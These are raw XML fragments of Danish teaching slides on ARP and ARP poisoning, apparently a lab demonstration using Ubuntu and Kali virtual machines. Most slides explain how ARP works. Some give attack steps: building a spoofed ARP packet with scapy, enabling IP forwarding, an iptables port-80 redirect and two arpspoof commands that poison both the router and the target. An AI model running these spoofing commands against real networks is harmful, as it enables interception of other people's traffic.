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ARP request </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>broadcast</a:t>
            </a:r>
            <a:r>
              <a:t> (1 -&gt; mange)</a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ARP response </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>unicast</a:t>
            </a:r>
            <a:r>
              <a:t> (1 -&gt; 1)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ARP table på Ubuntu før og efter ping til IP, som ikke var i maskinens ARP table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>(Det er denne tabel vi vil "forgifte" ved et ARP poisoning angreb.)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600"/>
            </a:pPr>
            <a:r>
              <a:t>Enkelt ARP-pakke bygget og sendt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>1) Start scapy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>2) Byg pakke:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>		Ether-niveau: ARP-pakke, Type: "who-has" afsender-MAC, afsender-IP, destination-ip.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>3) Send pakke</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1600"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rPr b="1"/>
              <a:t>ARP-tabel før og efter ARP-poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1600"/>
            </a:pPr>
            <a:r>
              <a:t>De to nederste linier er udtryk for hhv. den "forgiftede" entry og afsendende Kali.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Efter et stykke tid vil HWadress skifte til "(incomplet)", da Ubuntu-boksen vil spørge på ny senere, men her ikke få svar, da der blot blev sendt en enkelt pakke.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rPr b="1"/>
              <a:t>Forberedelser (angribende maskine)</a:t>
            </a:r>
            <a:r>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="271929" indent="-271929">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicParenR" startAt="1"/>
              <a:defRPr sz="1400"/>
            </a:pPr>
            <a:r>
              <a:t>Slå IP-forwarding til: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echo "1" &gt; /proc/sys/net/ipv4/ip_forward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71929" indent="-271929">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicParenR" startAt="1"/>
              <a:defRPr sz="1400"/>
            </a:pPr>
            <a:r>
              <a:t>Aktiver IP-forwarding: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sysctl -p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71929" indent="-271929">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicParenR" startAt="1"/>
              <a:defRPr sz="1400"/>
            </a:pPr>
            <a:r>
              <a:t>Redirection port 80 til 8880: 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iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8880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71929" indent="-271929">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicParenR" startAt="1"/>
              <a:defRPr sz="1400"/>
            </a:pPr>
            <a:r>
              <a:t>Start ARPspoof x2 for at angribe både router og "målet" (i separate faner her): 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	arpspoof -i eth0 -t 192.168.65.132 192.168.65.2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	arpspoof -i eth0 -t 192.168.65.2 192.168.65.132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RP (og arp poisoning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defRPr sz="12240"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ARP (og arp poisoning)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Kresten Jacobs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Kresten Jacobsen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RP (og arp poisoning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ARP (og arp poisoning)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Baggrund: ARP - Address Resolution Protoc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Baggrund: ARP - Address Resolution Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Hvem er hvem på netværke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Hvem er hvem på netværket?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Oversættelse mellem IP-adresser og MAC-adreser.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4419" y="4360207"/>
            <a:ext cx="5969001" cy="516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RP (og arp poisoning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ARP (og arp poisoning)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Baggrund: ARP - Address Resolution Protoc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Baggrund: ARP - Address Resolution Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Ubuntu 64-bit-2017-12-17-11-42-10.png" descr="Ubuntu 64-bit-2017-12-17-11-42-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1316" y="2190533"/>
            <a:ext cx="9962168" cy="7471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RP (og arp poisoning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ARP (og arp poisoning)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Eksempel 1 - ARP Poisoning med sca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Eksempel 1 - ARP Poisoning med scapy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184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5" name="Kali-Linux-2017.2-vm-amd64-2017-12-17-12-22-39.png" descr="Kali-Linux-2017.2-vm-amd64-2017-12-17-12-22-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4711" y="2159513"/>
            <a:ext cx="9875378" cy="7406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RP (og arp poisoning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ARP (og arp poisoning)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Eksempel 1 - ARP Poisoning med sca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Eksempel 1 - ARP Poisoning med scapy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191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Ubuntu 64-bit-2017-12-17-12-22-54.png" descr="Ubuntu 64-bit-2017-12-17-12-22-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5403" y="2157054"/>
            <a:ext cx="9933994" cy="7450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RP (og arp poisoning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ARP (og arp poisoning)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Eksempel 2 - ARP Poisoning med ARPSpoo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Eksempel 2 - ARP Poisoning med ARPSpoof</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198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9" name="Kali-Linux-2017.2-vm-amd64-2017-12-17-13-25-11.png" descr="Kali-Linux-2017.2-vm-amd64-2017-12-17-13-25-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2400" y="2083664"/>
            <a:ext cx="10160000" cy="76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iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8880"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619628" y="4552950"/>
            <a:ext cx="97655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3400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="14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iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8880 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RP (og arp poisoning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ARP (og arp poisoning)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Eksempel 2 - ARP Poisoning med ARPSpoo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Eksempel 2 - ARP Poisoning med ARPSpoof</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206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7" name="Ubuntu 64-bit-2017-12-17-13-28-04.png" descr="Ubuntu 64-bit-2017-12-17-13-28-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071667"/>
            <a:ext cx="10160000" cy="76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